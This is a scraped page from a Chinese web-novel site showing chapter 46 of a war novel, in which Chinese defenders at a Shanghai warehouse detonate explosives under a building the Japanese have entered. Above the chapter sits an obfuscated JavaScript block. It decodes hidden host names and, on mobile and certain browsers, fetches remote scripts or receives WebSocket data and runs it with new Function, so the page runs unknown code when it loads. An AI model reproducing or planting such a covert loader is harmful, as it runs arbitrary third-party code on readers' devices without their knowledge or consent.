笔趣阁

字:
关灯 护眼
笔趣阁 > 从八百开始崛起 > 第46章 惊天一爆
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x73\x49\x42\x6b\x73\x42\x45\x58\x66\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NramRrZnMucW9ybb3NtYWxsLmNvbbQ==','d3NzOi8vd3MMuc3luZ2d5LmNvbTo5MMDkw',window,document,['b','M']);}:function(){};

第46章 惊天一爆

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
位于租界内苏州河南岸的中国民众们今天绝对是被刺激到不行。
  心情完全是过山车式的一波三折。
  先是日军凶威赫赫,看似一战就能攻克仓库大楼让人忧心不已;接着中国守军异军突起,一波火力输出打得日寇威风尽失不说还在苦苦挣命;再然后是日军正面战场发威又将中国守军火力压制,心又提了起来......
  不过十几分钟的激战,让中国民众的心大起大落,嗓子更是受罪,许多人的嗓子都已经吼至嘶哑,这会儿都发不出太大的声音。
  然后,临近河边的仓库窗边突然站起十几个深蓝色军服,扯着嗓子吼:“瓜娃子,都给老子趴到起!抱起脑壳!”
  ......
  懵!一脸懵!
  别说岸边负责维持秩序的西方士兵们懵的很,就连中国民众们都是懵的。
  川话虽然口音重,但绝不像江南方言那般难懂,江浙一带就算相邻的两个县互相听不懂对方说话那是再正常不过了,能听到这个声音的中国人基本都懂。
  听不懂的,只能是歪果仁。
  就是,心理上有些难接受。
  怎么个意思?我们给你们助威,还骂咱们笨蛋?
  当然,也有聪明人,看到十几个士兵脸红脖子粗的都快吼破了嗓门的焦急之态,立刻趴到了地上并招呼着周围人趴下。
  从众心理就是这样,一看很多人这么做,还没想明白的也趴下了,没趴下的也被拽趴下。
  先前那个激动的带着儿子去买饼的长袍中年人则更机智一些,一闪身就拉着妻儿躲进了一栋楼宇的墙角,还拿着身体死死护住他最要保护的两人。
  他父亲是川人,他知道,瓜娃子不过是川省口头禅,能这样喊出来,潜台词不过是不趴的就是笨蛋、哈儿!
  “窝特?”西方中尉脸上写满一个大大的问号。
  而他的顶头上司的顶头上司,还在微微感叹格局准备说出自己想法的准将阁下,看着岸边突然趴下的一片中国民众,脸色微微一僵,顾不得再跟下属吹牛逼,猛然抬头看向远方,瞳孔狠狠一缩。
  “谢特!”
  “1号目标,起爆!”
  唐刀声音冷似刀。
  “给老子炸啊!”收到唐刀命令的刘大头却是热如火。
  狠狠按下起爆杆的军士班长那一刻面红耳赤的似乎脑袋都因为激动而生生憋大了一圈。
  不激动不成啊!
  抱着必死之心的1营来之前携带了一千公斤炸药,本意是在最后关头将自己和阵地一起送上天,那成想唐刀一来就劝服团副改变主意,分出一半的炸药量放到了别处。
  刘大头和绝大多数人想的一样,苏州河北路算是闸北区极繁华的街道,街道两侧矗立着不少和四行仓库差不多的大楼,虽然在炮火中损毁不少成为废墟,但还留了好几栋,谁知道日本人会选择那栋?
  几百公斤的炸药炸一栋楼没问题,可若是分散爆破可就起不到最好效果。
  依旧是唐刀选定楼宇,近乎孤注一掷的将爆破点选在了那栋距离达200多米远的四层银行大楼。
  唐刀虽然很牛逼,但这个只能是赌运气,本着飞砖头说不定都能把日本人砸得头破血流的念头,三排一班在大头班长的带领下布置好了爆破点,200多米的超远距离将爆破专用电线也全部用光,包括挖沟、掩埋、伪装,光是这工程都花老劲了。
  然后,谁也没想到的是,日本人,竟然真的就进了那栋楼。
  这下,终于不用靠什么砖头碎木砸人了。
  而是,可以空中飞人。
『加入书签,方便阅读』
热门推荐
长夜余火 快看那个大佬 有请小师叔 在港综成为传说 旧日之箓 诡异世界生存手册 诡秘之主 奥术神座 灭运图录 武道宗师